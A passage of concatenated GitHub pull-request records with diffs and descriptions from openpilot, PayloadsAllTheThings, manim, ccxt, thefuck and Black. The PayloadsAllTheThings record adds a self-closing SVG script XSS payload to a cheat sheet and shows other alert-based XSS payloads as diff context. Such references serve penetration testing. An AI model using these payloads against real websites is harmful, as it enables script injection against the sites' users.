+ ret.minSteerSpeed = 17.5 # m/s 17 on the way up, 13 on the way down once engaged. + ret.centerToFront = ret.wheelbase * 0.44 ret.enableBsm = 720 in fingerprint[0] diff --git a/selfdrive/car/chrysler/values.py b/selfdrive/car/chrysler/values.py index 16530ed9894956..02261a0b633587 100644 --- a/selfdrive/car/chrysler/values.py +++ b/selfdrive/car/chrysler/values.py @@ -1,3 +1,4 @@ +from enum import IntFlag from dataclasses import dataclass from enum import Enum from typing import Dict, List, Optional, Union @@ -11,6 +12,10 @@ Ecu = car.CarParams.Ecu +class ChryslerFlags(IntFlag): + HIGHER_MIN_STEERING_SPEED = 1 + + class CAR: # Chrysler PACIFICA_2017_HYBRID = "CHRYSLER PACIFICA HYBRID 2017"
fritzie29#1365 on Discord has a 2017 Pacifica with newer 2020 EPS firmware, meaning that the dealer likely reflashed their EPS while taking it in for service, unfortunately raising their minimum steer speed. We can't gate this on platform any more, since it can differ based on the EPS firmware. I quickly went through all our EPS firmwares, and this seems right, but will do a second check. EDIT: False alarm, this user reports that he had his entire rack and pinion replaced, and his dongle is the only one with this updated firmware, so it's unlikely this will become a widespread phenomenon. The PR now only includes his FW and abstracts the higher steering speed limit into a flag. EDIT 2: Actually, I have a report of another user with a 2017 having their EPS flashed by a dealer, only to find out they couldn't use LKAS under 30 any more. They got the dealer to flash it back and can now use it at 9 mph again. The dealer told them to avoid having their EPS flashed. So it is possible for dealers to flash old EPSs, though it appears exceedingly rare. ![Screenshot from 2022-12-05 22-03-21](https://user-images.githubusercontent.com/25857203/205832983-a11ab953-dca9-461f-82cb-6e601fdaaa8f.png)
https://api.github.com/repos/commaai/openpilot/pulls/26711
2022-12-06T02:24:58Z
2022-12-07T20:04:33Z
2022-12-07T20:04:33Z
2022-12-07T20:04:34Z
1,384
commaai/openpilot
9,216
add Self Closing Script
diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 8b46e60dfc..15495bddc4 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -10,7 +10,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [Javascript keylogger](#javascript-keylogger) - [Other ways](#other-ways) - [Identify an XSS endpoint](#identify-an-xss-endpoint) -- [XSS in HTML/Applications](#xss-in-htmlapplications) +- [XSS in HTML/Applications](#xss-in-llapplications) - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri) - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files) - [XSS in PostMessage](#xss-in-postmessage) @@ -143,6 +143,7 @@ Svg payload <svg id=alert(1) onload=eval(id)> "><svg/onload=alert(String.fromCharCode(88,83,83))> "><svg/onload=alert(/XSS/) +<svg><script href=data:,alert(1) />(`Firefox` is the only browser which allows self closing script) Div payload <div onpointerover="alert(45)">MOVE HERE</div> @@ -1128,3 +1129,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) - [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet) - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf) +- [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/202
2020-05-06T18:29:52Z
2020-05-06T20:16:06Z
2020-05-06T20:16:06Z
2020-05-06T20:16:21Z
513
swisskyrepo/PayloadsAllTheThings
8,593
add option -i to save as gif
diff --git a/manimlib/config.py b/manimlib/config.py index 999c423ae7..c80740bed2 100644 --- a/manimlib/config.py +++ b/manimlib/config.py @@ -52,6 +52,11 @@ def parse_cli(): action="store_true", help="Save each frame as a png", ), + parser.add_argument( + "-i", "--save_as_gif", + action="store_true", + help="Save the video as gif", + ), parser.add_argument( "-f", "--show_file_in_finder", action="store_true", @@ -161,6 +166,7 @@ def get_configuration(args): "write_to_movie": args.write_to_movie or not args.save_last_frame, "save_last_frame": args.save_last_frame, "save_pngs": args.save_pngs, + "save_as_gif": args.save_as_gif, # If -t is passed in (for transparent), this will be RGBA "png_mode": "RGBA" if args.transparent else "RGB", "movie_file_extension": ".mov" if args.transparent else ".mp4", diff --git a/manimlib/scene/scene_file_writer.py b/manimlib/scene/scene_file_writer.py index 3b078a479b..5b6e903df1 100644 --- a/manimlib/scene/scene_file_writer.py +++ b/manimlib/scene/scene_file_writer.py @@ -27,6 +27,7 @@ class SceneFileWriter(object): "png_mode": "RGBA", "save_last_frame": False, "movie_file_extension": ".mp4", + "gif_file_extension": ".gif", "livestreaming": False, "to_twitch": False, "twitch_key": None, @@ -69,6 +70,12 @@ def init_output_directories(self): file_name, self.movie_file_extension ) ) + self.gif_file_path = os.path.join( + movie_dir, + add_extension_if_not_present( + file_name, self.gif_file_extension + ) + ) self.partial_movie_directory = guarantee_existance(os.path.join( movie_dir, self.get_partial_movie_directory(), @@ -299,10 +306,19 @@ def combine_movie_files(self): '-f', 'concat', '-safe', '0', '-i', file_list, - '-c', 'copy', '-loglevel', 'error', - movie_file_path + ] + if not self.save_as_gif: + commands +=[ + '-c', 'copy', + movie_file_path + ] + if self.save_as_gif: + movie_file_path=self.gif_file_path + commands +=[ + movie_file_path, + ] if not self.includes_sound: commands.insert(-1, '-an')
I added the option to save as a gif; however, the mp4 or mov file still needs to be saved as well. I'll be trying to find a workaround, but it works despite that. When using the -i option, a .gif file will be saved to the output directory.
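Roughly the ffmpeg invocation the gif path ends up running, shown standalone with placeholder paths (the real code assembles the list inside `SceneFileWriter`):

```python
import subprocess

partial_list = 'partial_movie_file_list.txt'   # placeholder path
gif_file_path = 'SceneName.gif'                # placeholder path

commands = [
    'ffmpeg', '-y',
    '-f', 'concat', '-safe', '0',
    '-i', partial_list,
    '-loglevel', 'error',
    gif_file_path,   # no '-c copy' here: the stream is re-encoded as GIF
]
subprocess.call(commands)
```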
https://api.github.com/repos/3b1b/manim/pulls/529
2019-05-08T05:11:55Z
2019-06-02T19:13:23Z
2019-06-02T19:13:23Z
2019-06-02T19:13:23Z
645
3b1b/manim
18,094
feat(bybit): improve market orders for UTA
diff --git a/ts/src/bybit.ts b/ts/src/bybit.ts index 87a9c5bd7d28..a4d6b4cf72ff 100644 --- a/ts/src/bybit.ts +++ b/ts/src/bybit.ts @@ -40,7 +40,7 @@ export default class bybit extends Exchange { 'closeAllPositions': false, 'closePosition': false, 'createMarketBuyOrderWithCost': true, - 'createMarketSellOrderWithCost': false, + 'createMarketSellOrderWithCost': true, 'createOrder': true, 'createOrders': true, 'createOrderWithTakeProfitAndStopLoss': true, @@ -960,7 +960,7 @@ export default class bybit extends Exchange { 'fetchMarkets': [ 'spot', 'linear', 'inverse', 'option' ], 'enableUnifiedMargin': undefined, 'enableUnifiedAccount': undefined, - 'createMarketBuyOrderRequiresPrice': true, + 'createMarketBuyOrderRequiresPrice': true, // only true for classic accounts 'createUnifiedMarginAccount': false, 'defaultType': 'swap', // 'swap', 'future', 'option', 'spot' 'defaultSubType': 'linear', // 'linear', 'inverse' @@ -3455,8 +3455,31 @@ export default class bybit extends Exchange { if (!market['spot']) { throw new NotSupported (this.id + ' createMarketBuyOrderWithCost() supports spot orders only'); } - params['createMarketBuyOrderRequiresPrice'] = false; - return await this.createOrder (symbol, 'market', 'buy', cost, undefined, params); + return await this.createOrder (symbol, 'market', 'buy', cost, 1, params); + } + + async createMarketSellOrderWithCost (symbol: string, cost, params = {}) { + /** + * @method + * @name bybit#createMarkeSellOrderWithCost + * @see https://bybit-exchange.github.io/docs/v5/order/create-order + * @description create a market sell order by providing the symbol and cost + * @param {string} symbol unified symbol of the market to create an order in + * @param {float} cost how much you want to trade in units of the quote currency + * @param {object} [params] extra parameters specific to the exchange API endpoint + * @returns {object} an [order structure]{@link https://docs.ccxt.com/#/?id=order-structure} + */ + await this.loadMarkets (); + const types = await this.isUnifiedEnabled (); + const enableUnifiedAccount = types[1]; + if (!enableUnifiedAccount) { + throw new NotSupported (this.id + ' createMarketSellOrderWithCost() supports UTA accounts only'); + } + const market = this.market (symbol); + if (!market['spot']) { + throw new NotSupported (this.id + ' createMarketSellOrderWithCost() supports spot orders only'); + } + return await this.createOrder (symbol, 'market', 'sell', cost, 1, params); } async createOrder (symbol: string, type: OrderType, side: OrderSide, amount, price = undefined, params = {}) { @@ -3501,7 +3524,7 @@ export default class bybit extends Exchange { } const trailingAmount = this.safeString2 (params, 'trailingAmount', 'trailingStop'); const isTrailingAmountOrder = trailingAmount !== undefined; - const orderRequest = this.createOrderRequest (symbol, type, side, amount, price, params); + const orderRequest = this.createOrderRequest (symbol, type, side, amount, price, params, enableUnifiedAccount); let response = undefined; if (isTrailingAmountOrder) { response = await this.privatePostV5PositionTradingStop (orderRequest); @@ -3524,7 +3547,7 @@ export default class bybit extends Exchange { return this.parseOrder (order, market); } - createOrderRequest (symbol: string, type: OrderType, side: OrderSide, amount, price = undefined, params = {}) { + createOrderRequest (symbol: string, type: OrderType, side: OrderSide, amount, price = undefined, params = {}, isUTA = true) { const market = this.market (symbol); symbol = market['symbol']; const lowerCaseType 
= type.toLowerCase (); @@ -3565,12 +3588,33 @@ export default class bybit extends Exchange { } else if (market['option']) { request['category'] = 'option'; } - if (market['spot'] && (type === 'market') && (side === 'buy')) { + const cost = this.safeString (params, 'cost'); + params = this.omit (params, 'cost'); + // if the cost is inferable, let's keep the old logic and ignore marketUnit, to minimize the impact of the changes + const isMarketBuyAndCostInferable = (lowerCaseType === 'market') && (side === 'buy') && ((price !== undefined) || (cost !== undefined)); + if (market['spot'] && (type === 'market') && isUTA && !isMarketBuyAndCostInferable) { + // UTA account can specify the cost of the order on both sides + if ((cost !== undefined) || (price !== undefined)) { + request['marketUnit'] = 'quoteCoin'; + let orderCost = undefined; + if (cost !== undefined) { + orderCost = cost; + } else { + const amountString = this.numberToString (amount); + const priceString = this.numberToString (price); + const quoteAmount = Precise.stringMul (amountString, priceString); + orderCost = quoteAmount; + } + request['qty'] = this.costToPrecision (symbol, orderCost); + } else { + request['marketUnit'] = 'baseCoin'; + request['qty'] = this.amountToPrecision (symbol, amount); + } + } else if (market['spot'] && (type === 'market') && (side === 'buy')) { + // classic accounts // for market buy it requires the amount of quote currency to spend let createMarketBuyOrderRequiresPrice = true; [ createMarketBuyOrderRequiresPrice, params ] = this.handleOptionAndParams (params, 'createOrder', 'createMarketBuyOrderRequiresPrice', true); - const cost = this.safeNumber (params, 'cost'); - params = this.omit (params, 'cost'); if (createMarketBuyOrderRequiresPrice) { if ((price === undefined) && (cost === undefined)) { throw new InvalidOrder (this.id + ' createOrder() requires the price argument for market buy orders to calculate the total cost to spend (amount * price), alternatively set the createMarketBuyOrderRequiresPrice option or param to false and pass the cost to spend in the amount argument'); @@ -3686,6 +3730,8 @@ export default class bybit extends Exchange { * @returns {object} an [order structure]{@link https://docs.ccxt.com/#/?id=order-structure} */ await this.loadMarkets (); + const accounts = await this.isUnifiedEnabled (); + const isUta = accounts[1]; const ordersRequests = []; const orderSymbols = []; for (let i = 0; i < orders.length; i++) { @@ -3697,7 +3743,7 @@ export default class bybit extends Exchange { const amount = this.safeValue (rawOrder, 'amount'); const price = this.safeValue (rawOrder, 'price'); const orderParams = this.safeValue (rawOrder, 'params', {}); - const orderRequest = this.createOrderRequest (marketId, type, side, amount, price, orderParams); + const orderRequest = this.createOrderRequest (marketId, type, side, amount, price, orderParams, isUta); ordersRequests.push (orderRequest); } const symbols = this.marketSymbols (orderSymbols, undefined, false, true, true); diff --git a/ts/src/test/static/request/bybit.json b/ts/src/test/static/request/bybit.json index 0d99684ffbb5..d56fea7de554 100644 --- a/ts/src/test/static/request/bybit.json +++ b/ts/src/test/static/request/bybit.json @@ -216,9 +216,12 @@ "output": "{\"symbol\":\"BTCUSDT\",\"side\":\"Buy\",\"orderType\":\"Limit\",\"category\":\"linear\",\"qty\":\"0.001\",\"price\":\"41000\",\"triggerDirection\":1,\"triggerPrice\":\"40000\",\"stopLoss\":\"39500\"}" }, { - "description": "Spot market buy order with 
createMarketBuyOrderRequiresPrice set to false on the testnet", + "description": "Spot market buy order with createMarketBuyOrderRequiresPrice set to false on the testnet (classic only)", "method": "createOrder", "url": "https://api-testnet.bybit.com/v5/order/create", + "options": { + "enableUnifiedAccount": false + }, "input": [ "BTC/USDT", "market", @@ -274,6 +277,47 @@ } ], "output": "{\"symbol\":\"BTCUSD\",\"side\":\"Sell\",\"orderType\":\"Market\",\"category\":\"inverse\",\"qty\":\"1\",\"reduceOnly\":true}" + }, + { + "description": "Create market buy with base amount (UTA only)", + "method": "createOrder", + "url": "https://api-testnet.bybit.com/v5/order/create", + "input": [ + "LTC/USDT", + "market", + "buy", + 0.2 + ], + "output": "{\"symbol\":\"LTCUSDT\",\"side\":\"Buy\",\"orderType\":\"Market\",\"category\":\"spot\",\"marketUnit\":\"baseCoin\",\"qty\":\"0.2\"}" + }, + { + "description": "Create market sell with cost (UTA only)", + "method": "createOrder", + "url": "https://api-testnet.bybit.com/v5/order/create", + "input": [ + "LTC/USDT", + "market", + "sell", + 0.2, + 10 + ], + "output": "{\"symbol\":\"LTCUSDT\",\"side\":\"Sell\",\"orderType\":\"Market\",\"category\":\"spot\",\"marketUnit\":\"quoteCoin\",\"qty\":\"2\"}" + }, + { + "description": "market sell with cost in params (UTA only)", + "method": "createOrder", + "url": "https://api-testnet.bybit.com/v5/order/create", + "input": [ + "LTC/USDT", + "market", + "sell", + null, + null, + { + "cost": 3 + } + ], + "output": "{\"symbol\":\"LTCUSDT\",\"side\":\"Sell\",\"orderType\":\"Market\",\"category\":\"spot\",\"marketUnit\":\"quoteCoin\",\"qty\":\"3\"}" } ], "createMarketBuyOrderWithCost": [ @@ -288,6 +332,18 @@ "output": "{\"symbol\":\"LTCUSDT\",\"side\":\"Buy\",\"orderType\":\"Market\",\"category\":\"spot\",\"qty\":\"10\"}" } ], + "createMarketSellOrderWithCost": [ + { + "description": "market sell order with cost (UTA only)", + "method": "createMarkeSellOrderWithCost", + "url": "https://api-testnet.bybit.com/v5/order/create", + "input": [ + "LTC/USDT", + 5 + ], + "output": "{\"symbol\":\"LTCUSDT\",\"side\":\"Sell\",\"orderType\":\"Market\",\"category\":\"spot\",\"marketUnit\":\"quoteCoin\",\"qty\":\"5\"}" + } + ], "createOrders": [ { "description": "Swap create orders", diff --git a/ts/src/test/test.ts b/ts/src/test/test.ts index cbe5258b6d16..3d4ebe0f34e7 100644 --- a/ts/src/test/test.ts +++ b/ts/src/test/test.ts @@ -1236,6 +1236,9 @@ export default class testMainClass extends baseMainTestClass { const results = methods[method]; for (let j = 0; j < results.length; j++) { const result = results[j]; + const oldExchangeOptions = exchange.options; // snapshot options; + const testExchangeOptions = exchange.safeValue (result, 'options', {}); + exchange.options = exchange.deepExtend (oldExchangeOptions, testExchangeOptions); // custom options to be used in the tests const description = exchange.safeValue (result, 'description'); if ((testName !== undefined) && (testName !== description)) { continue; @@ -1247,6 +1250,8 @@ export default class testMainClass extends baseMainTestClass { const type = exchange.safeString (exchangeData, 'outputType'); const skipKeys = exchange.safeValue (exchangeData, 'skipKeys', []); await this.testMethodStatically (exchange, method, result, type, skipKeys); + // reset options + exchange.options = oldExchangeOptions; } } await close (exchange); @@ -1264,6 +1269,9 @@ export default class testMainClass extends baseMainTestClass { for (let j = 0; j < results.length; j++) { const result = results[j]; 
const description = exchange.safeValue (result, 'description'); + const oldExchangeOptions = exchange.options; // snapshot options; + const testExchangeOptions = exchange.safeValue (result, 'options', {}); + exchange.options = exchange.deepExtend (oldExchangeOptions, testExchangeOptions); // custom options to be used in the tests const isDisabled = exchange.safeValue (result, 'disabled', false); if (isDisabled) { continue; @@ -1277,6 +1285,8 @@ export default class testMainClass extends baseMainTestClass { } const skipKeys = exchange.safeValue (exchangeData, 'skipKeys', []); await this.testResponseStatically (exchange, method, skipKeys, result); + // reset options + exchange.options = oldExchangeOptions; } } await close (exchange);
- UTA accounts can place market orders using the base or quote amount on both sides (buy and sell)
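For illustration only (not part of the PR record above): a minimal usage sketch from ccxt's Python bindings, assuming the snake_case aliases ccxt normally generates for its unified camelCase methods and placeholder credentials.

```python
# Hypothetical usage sketch for a Bybit UTA spot account (placeholder credentials).
# create_market_sell_order_with_cost is assumed to be the snake_case alias of the
# createMarketSellOrderWithCost method added in this PR.
import ccxt

exchange = ccxt.bybit({
    'apiKey': 'YOUR_API_KEY',   # placeholder
    'secret': 'YOUR_SECRET',    # placeholder
})

# Buy LTC spending exactly 50 USDT at market price.
buy_order = exchange.create_market_buy_order_with_cost('LTC/USDT', 50)

# Sell LTC worth exactly 50 USDT at market price (UTA spot accounts only).
sell_order = exchange.create_market_sell_order_with_cost('LTC/USDT', 50)

print(buy_order['id'], sell_order['id'])
```

On classic (non-UTA) accounts the sell-by-cost call would raise NotSupported, mirroring the check added in the diff.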
https://api.github.com/repos/ccxt/ccxt/pulls/20965
2024-01-25T16:51:57Z
2024-01-25T17:42:53Z
2024-01-25T17:42:53Z
2024-01-25T17:42:53Z
3,239
ccxt/ccxt
13,061
Fix grammar and spelling errors
diff --git a/README.md b/README.md index 4f396ce95..1b398a6ac 100644 --- a/README.md +++ b/README.md @@ -243,7 +243,7 @@ following rules are enabled by default: * `git_pull_clone` &ndash; clones instead of pulling when the repo does not exist; * `git_pull_uncommitted_changes` &ndash; stashes changes before pulling and pops them afterwards; * `git_push` &ndash; adds `--set-upstream origin $branch` to previous failed `git push`; -* `git_push_different_branch_names` &ndash; fixes pushes when local brach name does not match remote branch name; +* `git_push_different_branch_names` &ndash; fixes pushes when local branch name does not match remote branch name; * `git_push_pull` &ndash; runs `git pull` when `push` was rejected; * `git_push_without_commits` &ndash; Creates an initial commit if you forget and only `git add .`, when setting up a new project; * `git_rebase_no_changes` &ndash; runs `git rebase --skip` instead of `git rebase --continue` when there are no changes; @@ -268,7 +268,7 @@ following rules are enabled by default: * `has_exists_script` &ndash; prepends `./` when script/binary exists; * `heroku_multiple_apps` &ndash; add `--app <app>` to `heroku` commands like `heroku pg`; * `heroku_not_command` &ndash; fixes wrong `heroku` commands like `heroku log`; -* `history` &ndash; tries to replace command with most similar command from history; +* `history` &ndash; tries to replace command with the most similar command from history; * `hostscli` &ndash; tries to fix `hostscli` usage; * `ifconfig_device_not_found` &ndash; fixes wrong device names like `wlan0` to `wlp2s0`; * `java` &ndash; removes `.java` extension when running Java programs; @@ -283,7 +283,7 @@ following rules are enabled by default: * `man_no_space` &ndash; fixes man commands without spaces, for example `mandiff`; * `mercurial` &ndash; fixes wrong `hg` commands; * `missing_space_before_subcommand` &ndash; fixes command with missing space like `npminstall`; -* `mkdir_p` &ndash; adds `-p` when you try to create a directory without parent; +* `mkdir_p` &ndash; adds `-p` when you try to create a directory without a parent; * `mvn_no_command` &ndash; adds `clean package` to `mvn`; * `mvn_unknown_lifecycle_phase` &ndash; fixes misspelled life cycle phases with `mvn`; * `npm_missing_script` &ndash; fixes `npm` custom script name in `npm run-script <script>`; @@ -302,16 +302,16 @@ following rules are enabled by default: * `python_execute` &ndash; appends missing `.py` when executing Python files; * `python_module_error` &ndash; fixes ModuleNotFoundError by trying to `pip install` that module; * `quotation_marks` &ndash; fixes uneven usage of `'` and `"` when containing args'; -* `path_from_history` &ndash; replaces not found path with similar absolute path from history; +* `path_from_history` &ndash; replaces not found path with a similar absolute path from history; * `react_native_command_unrecognized` &ndash; fixes unrecognized `react-native` commands; * `remove_shell_prompt_literal` &ndash; remove leading shell prompt symbol `$`, common when copying commands from documentations; -* `remove_trailing_cedilla` &ndash; remove trailing cedillas `ç`, a common typo for european keyboard layouts; +* `remove_trailing_cedilla` &ndash; remove trailing cedillas `ç`, a common typo for European keyboard layouts; * `rm_dir` &ndash; adds `-rf` when you try to remove a directory; * `scm_correction` &ndash; corrects wrong scm like `hg log` to `git log`; * `sed_unterminated_s` &ndash; adds missing '/' to `sed`'s `s` commands; * `sl_ls` &ndash; 
changes `sl` to `ls`; * `ssh_known_hosts` &ndash; removes host from `known_hosts` on warning; -* `sudo` &ndash; prepends `sudo` to previous command if it failed because of permissions; +* `sudo` &ndash; prepends `sudo` to the previous command if it failed because of permissions; * `sudo_command_from_user_path` &ndash; runs commands from users `$PATH` with `sudo`; * `switch_lang` &ndash; switches command from your local layout to en; * `systemctl` &ndash; correctly orders parameters of confusing `systemctl`; @@ -322,7 +322,7 @@ following rules are enabled by default: * `tsuru_not_command` &ndash; fixes wrong `tsuru` commands like `tsuru shell`; * `tmux` &ndash; fixes `tmux` commands; * `unknown_command` &ndash; fixes hadoop hdfs-style "unknown command", for example adds missing '-' to the command on `hdfs dfs ls`; -* `unsudo` &ndash; removes `sudo` from previous command if a process refuses to run on super user privilege. +* `unsudo` &ndash; removes `sudo` from previous command if a process refuses to run on superuser privilege. * `vagrant_up` &ndash; starts up the vagrant instance; * `whois` &ndash; fixes `whois` command; * `workon_doesnt_exists` &ndash; fixes `virtualenvwrapper` env name os suggests to create new. @@ -425,15 +425,15 @@ Several *The Fuck* parameters can be changed in the file `$XDG_CONFIG_HOME/thefu * `rules` &ndash; list of enabled rules, by default `thefuck.const.DEFAULT_RULES`; * `exclude_rules` &ndash; list of disabled rules, by default `[]`; * `require_confirmation` &ndash; requires confirmation before running new command, by default `True`; -* `wait_command` &ndash; max amount of time in seconds for getting previous command output; +* `wait_command` &ndash; the max amount of time in seconds for getting previous command output; * `no_colors` &ndash; disable colored output; * `priority` &ndash; dict with rules priorities, rule with lower `priority` will be matched first; * `debug` &ndash; enables debug output, by default `False`; -* `history_limit` &ndash; numeric value of how many history commands will be scanned, like `2000`; +* `history_limit` &ndash; the numeric value of how many history commands will be scanned, like `2000`; * `alter_history` &ndash; push fixed command to history, by default `True`; * `wait_slow_command` &ndash; max amount of time in seconds for getting previous command output if it in `slow_commands` list; * `slow_commands` &ndash; list of slow commands; -* `num_close_matches` &ndash; maximum number of close matches to suggest, by default `3`. +* `num_close_matches` &ndash; the maximum number of close matches to suggest, by default `3`. * `excluded_search_path_prefixes` &ndash; path prefixes to ignore when searching for commands, by default `[]`. 
An example of `settings.py`: @@ -457,16 +457,16 @@ Or via environment variables: * `THEFUCK_RULES` &ndash; list of enabled rules, like `DEFAULT_RULES:rm_root` or `sudo:no_command`; * `THEFUCK_EXCLUDE_RULES` &ndash; list of disabled rules, like `git_pull:git_push`; * `THEFUCK_REQUIRE_CONFIRMATION` &ndash; require confirmation before running new command, `true/false`; -* `THEFUCK_WAIT_COMMAND` &ndash; max amount of time in seconds for getting previous command output; +* `THEFUCK_WAIT_COMMAND` &ndash; the max amount of time in seconds for getting previous command output; * `THEFUCK_NO_COLORS` &ndash; disable colored output, `true/false`; * `THEFUCK_PRIORITY` &ndash; priority of the rules, like `no_command=9999:apt_get=100`, rule with lower `priority` will be matched first; * `THEFUCK_DEBUG` &ndash; enables debug output, `true/false`; * `THEFUCK_HISTORY_LIMIT` &ndash; how many history commands will be scanned, like `2000`; * `THEFUCK_ALTER_HISTORY` &ndash; push fixed command to history `true/false`; -* `THEFUCK_WAIT_SLOW_COMMAND` &ndash; max amount of time in seconds for getting previous command output if it in `slow_commands` list; +* `THEFUCK_WAIT_SLOW_COMMAND` &ndash; the max amount of time in seconds for getting previous command output if it in `slow_commands` list; * `THEFUCK_SLOW_COMMANDS` &ndash; list of slow commands, like `lein:gradle`; -* `THEFUCK_NUM_CLOSE_MATCHES` &ndash; maximum number of close matches to suggest, like `5`. +* `THEFUCK_NUM_CLOSE_MATCHES` &ndash; the maximum number of close matches to suggest, like `5`. * `THEFUCK_EXCLUDED_SEARCH_PATH_PREFIXES` &ndash; path prefixes to ignore when searching for commands, by default `[]`. For example:
https://api.github.com/repos/nvbn/thefuck/pulls/1193
2021-05-02T21:10:42Z
2021-06-29T19:25:02Z
2021-06-29T19:25:02Z
2021-06-29T19:43:34Z
2,170
nvbn/thefuck
30,636
Improve & update release process to reflect recent changes
diff --git a/docs/contributing/release_process.md b/docs/contributing/release_process.md index 6a4b8680808..be9b08a6c82 100644 --- a/docs/contributing/release_process.md +++ b/docs/contributing/release_process.md @@ -1,40 +1,85 @@ # Release process -_Black_ has had a lot of work automating its release process. This document sets out to -explain what everything does and how to release _Black_ using said automation. - -## Cutting a Release - -To cut a release, you must be a _Black_ maintainer with `GitHub Release` creation -access. Using this access, the release process is: - -1. Cut a new PR editing `CHANGES.md` and the docs to version the latest changes +_Black_ has had a lot of work done into standardizing and automating its release +process. This document sets out to explain how everything works and how to release +_Black_ using said automation. + +## Release cadence + +**We aim to release whatever is on `main` every 1-2 months.** This ensures merged +improvements and bugfixes are shipped to users reasonably quickly, while not massively +fracturing the user-base with too many versions. This also keeps the workload on +maintainers consistent and predictable. + +If there's not much new on `main` to justify a release, it's acceptable to skip a +month's release. Ideally January releases should not be skipped because as per our +[stability policy](labels/stability-policy), the first release in a new calendar year +may make changes to the _stable_ style. While the policy applies to the first release +(instead of only January releases), confining changes to the stable style to January +will keep things predictable (and nicer) for users. + +Unless there is a serious regression or bug that requires immediate patching, **there +should not be more than one release per month**. While version numbers are cheap, +releases require a maintainer to both commit to do the actual cutting of a release, but +also to be able to deal with the potential fallout post-release. Releasing more +frequently than monthly nets rapidly diminishing returns. + +## Cutting a release + +**You must have `write` permissions for the _Black_ repository to cut a release.** + +The 10,000 foot view of the release process is that you prepare a release PR and then +publish a [GitHub Release]. This triggers [release automation](#release-workflows) that +builds all release artifacts and publishes them to the various platforms we publish to. + +To cut a release: + +1. Determine the release's version number + - **_Black_ follows the [CalVer] versioning standard using the `YY.M.N` format** + - So unless there already has been a release during this month, `N` should be `0` + - Example: the first release in January, 2022 → `22.1.0` +1. File a PR editing `CHANGES.md` and the docs to version the latest changes + 1. Replace the `## Unreleased` header with the version number 1. Remove any empty sections for the current release - 2. Add a new empty template for the next release (template below) - 3. Example PR: [#2616](https://github.com/psf/black/pull/2616) - 4. Example title: `Update CHANGES.md for XX.X release` -2. Once the release PR is merged ensure all CI passes - 1. If not, ensure there is an Issue open for the cause of failing CI (generally we'd - want this fixed before cutting a release) -3. Open `CHANGES.md` and copy the _raw markdown_ of the latest changes to use in the - description of the GitHub Release. -4. 
Go and [cut a release](https://github.com/psf/black/releases) using the GitHub UI so - that all workflows noted below are triggered. - 1. The release version and tag should be the [CalVer](https://calver.org) version - _Black_ used for the current release e.g. `21.6` / `21.5b1` - 2. _Black_ uses [setuptools scm](https://pypi.org/project/setuptools-scm/) to pull - the current version for the package builds and release. -5. Once the release is cut, you're basically done. It's a good practice to go and watch - to make sure all the [GitHub Actions](https://github.com/psf/black/actions) pass, - although you should receive an email to your registered GitHub email address should - one fail. - 1. You should see all the release workflows and lint/unittests workflows running on - the new tag in the Actions UI - -If anything fails, please go read the respective action's log output and configuration -file to reverse engineer your way to a fix/soluton. - -## Changelog template + 1. (_optional_) Read through and copy-edit the changelog (eg. by moving entries, + fixing typos, or rephrasing entries) + 1. Add a new empty template for the next release above + ([template below](#changelog-template)) + 1. Update references to the latest version in + {doc}`/integrations/source_version_control` and + {doc}`/usage_and_configuration/the_basics` + - Example PR: [GH-3139] +1. Once the release PR is merged, wait until all CI passes + - If CI does not pass, **stop** and investigate the failure(s) as generally we'd want + to fix failing CI before cutting a release +1. [Draft a new GitHub Release][new-release] + 1. Click `Choose a tag` and type in the version number, then select the + `Create new tag: YY.M.N on publish` option that appears + 1. Verify that the new tag targets the `main` branch + 1. You can leave the release title blank, GitHub will default to the tag name + 1. Copy and paste the _raw changelog Markdown_ for the current release into the + description box +1. Publish the GitHub Release, triggering [release automation](#release-workflows) that + will handle the rest +1. At this point, you're basically done. It's good practice to go and [watch and verify + that all the release workflows pass][black-actions], although you will receive a + GitHub notification should something fail. + - If something fails, don't panic. Please go read the respective workflow's logs and + configuration file to reverse-engineer your way to a fix/solution. + +Congratulations! You've successfully cut a new release of _Black_. Go and stand up and +take a break, you deserve it. + +```{important} +Once the release artifacts reach PyPI, you may see new issues being filed indicating +regressions. While regressions are not great, they don't automatically mean a hotfix +release is warranted. Unless the regressions are serious and impact many users, a hotfix +release is probably unnecessary. + +In the end, use your best judgement and ask other maintainers for their thoughts. 
+``` + +### Changelog template Use the following template for a clean changelog after the release: @@ -45,7 +90,7 @@ Use the following template for a clean changelog after the release: <!-- Include any especially major or disruptive changes here --> -### Style +### Stable style <!-- Changes that affect Black's stable style --> @@ -53,93 +98,115 @@ Use the following template for a clean changelog after the release: <!-- Changes that affect Black's preview style --> -### _Blackd_ - -<!-- Changes to blackd --> - ### Configuration <!-- Changes to how Black can be configured --> -### Documentation +### Packaging -<!-- Major changes to documentation and policies. Small docs changes - don't need a changelog entry. --> +<!-- Changes to how Black is packaged, such as dependency requirements --> -### Integrations +### Parser -<!-- For example, Docker, GitHub Actions, pre-commit, editors --> +<!-- Changes to the parser or to version autodetection --> + +### Performance + +<!-- Changes that improve Black's performance. --> ### Output <!-- Changes to Black's terminal output and error messages --> -### Packaging - -<!-- Changes to how Black is packaged, such as dependency requirements --> +### _Blackd_ -### Parser +<!-- Changes to blackd --> -<!-- Changes to the parser or to version autodetection --> +### Integrations -### Performance +<!-- For example, Docker, GitHub Actions, pre-commit, editors --> -<!-- Changes that improve Black's performance. --> +### Documentation +<!-- Major changes to documentation and policies. Small docs changes + don't need a changelog entry. --> ``` ## Release workflows -All _Blacks_'s automation workflows use GitHub Actions. All workflows are therefore -configured using `.yml` files in the `.github/workflows` directory of the _Black_ +All of _Black_'s release automation uses [GitHub Actions]. All workflows are therefore +configured using YAML files in the `.github/workflows` directory of the _Black_ repository. +They are triggered by the publication of a [GitHub 